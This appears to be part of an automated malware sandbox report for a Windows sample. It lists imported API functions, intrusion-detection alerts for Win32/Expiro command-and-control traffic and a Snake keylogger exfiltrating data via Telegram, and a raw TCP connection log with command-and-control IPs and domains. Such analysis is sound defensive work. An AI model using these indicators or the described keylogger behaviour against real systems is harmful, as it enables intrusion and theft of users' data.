                                                                                                                                                                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                            EnglishGreat Britain
                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2024-12-16T14:10:20.041310+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44973054.244.188.17780TCP
                                                                                                                                                                                                                            2024-12-16T14:10:20.509665+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731158.101.44.24280TCP
                                                                                                                                                                                                                            2024-12-16T14:10:23.085656+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449733TCP
                                                                                                                                                                                                                            2024-12-16T14:10:23.085656+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449733TCP
                                                                                                                                                                                                                            2024-12-16T14:10:25.157393+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449734TCP
                                                                                                                                                                                                                            2024-12-16T14:10:25.157393+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449734TCP
                                                                                                                                                                                                                            2024-12-16T14:10:27.074299+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4551051.1.1.153UDP
                                                                                                                                                                                                                            2024-12-16T14:10:27.185679+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449735TCP
                                                                                                                                                                                                                            2024-12-16T14:10:27.185679+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449735TCP
                                                                                                                                                                                                                            2024-12-16T14:10:28.124938+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731158.101.44.24280TCP
                                                                                                                                                                                                                            2024-12-16T14:10:30.375537+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449737149.154.167.220443TCP
                                                                                                                                                                                                                            2024-12-16T14:10:34.503647+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4533131.1.1.153UDP
                                                                                                                                                                                                                            2024-12-16T14:11:46.431546+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44976682.112.184.19780TCP
                                                                                                                                                                                                                            2024-12-16T14:12:11.300826+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449867TCP
                                                                                                                                                                                                                            2024-12-16T14:12:11.300826+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449867TCP
                                                                                                                                                                                                                            2024-12-16T14:12:14.072128+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449873TCP
                                                                                                                                                                                                                            2024-12-16T14:12:14.072128+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449873TCP
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.564707994 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.684539080 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.687526941 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.760102987 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.760142088 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.766028881 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.879798889 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.879854918 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.885795116 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.885871887 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:18.886172056 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:19.005875111 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.041053057 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.041254997 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.041310072 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.042082071 CET4973080192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.088876009 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.094667912 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.161751032 CET804973054.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.214878082 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.468091011 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.509665012 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.649657011 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.649703026 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.649960041 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.659054995 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.659070969 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.838481903 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958214045 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958312035 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958446026 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:20.958460093 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.078157902 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.078236103 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.876902103 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.876971006 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.881438971 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.881453991 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.881741047 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.931533098 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.954922915 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:21.995332003 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.353849888 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.353928089 CET44349732172.67.177.134192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.354038000 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.393781900 CET49732443192.168.2.4172.67.177.134
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.965517044 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.965567112 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.965704918 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:22.965742111 CET4973380192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.085655928 CET804973318.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.564536095 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.684482098 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.684623003 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.685245037 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.685316086 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.805152893 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:23.805171013 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.037020922 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.037038088 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.037142038 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.037345886 CET4973480192.168.2.454.244.188.177
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.157392979 CET804973454.244.188.177192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.847995996 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.967796087 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.967906952 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.968132973 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:25.968163013 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:26.087943077 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:26.087956905 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.065583944 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.065645933 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.065743923 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.065787077 CET4973580192.168.2.444.221.84.105
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.185678959 CET804973544.221.84.105192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.687941074 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.717106104 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.807760000 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.837196112 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:27.840693951 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.035669088 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.035669088 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.069758892 CET8049731158.101.44.242192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.124938011 CET4973180192.168.2.4158.101.44.242
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.155601978 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.156291008 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.245682001 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.245712996 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.245773077 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.246264935 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.246273041 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:28.964426994 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.009702921 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.302666903 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.422538042 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.422957897 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.423388004 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.543482065 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.612699986 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.612792015 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.616266012 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.616283894 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.616544962 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.618927956 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.659327030 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.659965992 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:29.659979105 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.375576973 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.375678062 CET44349737149.154.167.220192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.376275063 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.376406908 CET49737443192.168.2.4149.154.167.220
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.593115091 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:30.650337934 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.314531088 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.435236931 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.435422897 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.435611010 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:31.555386066 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772351027 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772660017 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772727013 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772749901 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772763968 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772882938 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772896051 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772907972 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772921085 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772927046 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772948027 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.772969007 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.773150921 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.773164034 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.773206949 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.893018961 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.893035889 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.893124104 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.964778900 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.964828968 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.964911938 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.968852043 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.995321989 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:32.995398045 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.009707928 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.115232944 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.115263939 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.331868887 CET8049736172.234.222.138192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.333394051 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.384818077 CET4973680192.168.2.4172.234.222.138
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.453651905 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.707448959 CET804973872.52.179.174192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.722455025 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.759716034 CET4973880192.168.2.472.52.179.174
                                                                                                                                                                                                                            Dec 16, 2024 14:10:33.842439890 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.206362009 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.207750082 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.207786083 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.207858086 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.216240883 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.216279030 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.216310024 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.221673012 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.221745014 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.221987963 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.230150938 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.230170012 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.230566978 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.238523006 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.238584995 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.239500999 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.247009039 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.247246981 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.247282028 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.255249023 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.255366087 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.255371094 CET804973976.223.26.96192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:34.306664944 CET4973980192.168.2.476.223.26.96
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.107353926 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227464914 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227560997 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227845907 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.227868080 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.347702026 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:35.347718954 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.233135939 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.233174086 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.233232975 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.236952066 CET4974180192.168.2.418.141.10.107
                                                                                                                                                                                                                            Dec 16, 2024 14:10:37.356884956 CET804974118.141.10.107192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.805296898 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.925117016 CET804974582.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.927400112 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.931471109 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:10:38.931513071 CET4974580192.168.2.482.112.184.197
                                                                                                                                                                                                                            Dec 16, 2024 14:10:39.051383018 CET804974582.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:10:39.051397085 CET804974582.112.184.197192.168.2.4
                                                                                                                                                                                                                            Dec 16, 2024 14:11:00.838785887 CET804974582.112.184.197192.168.2.4
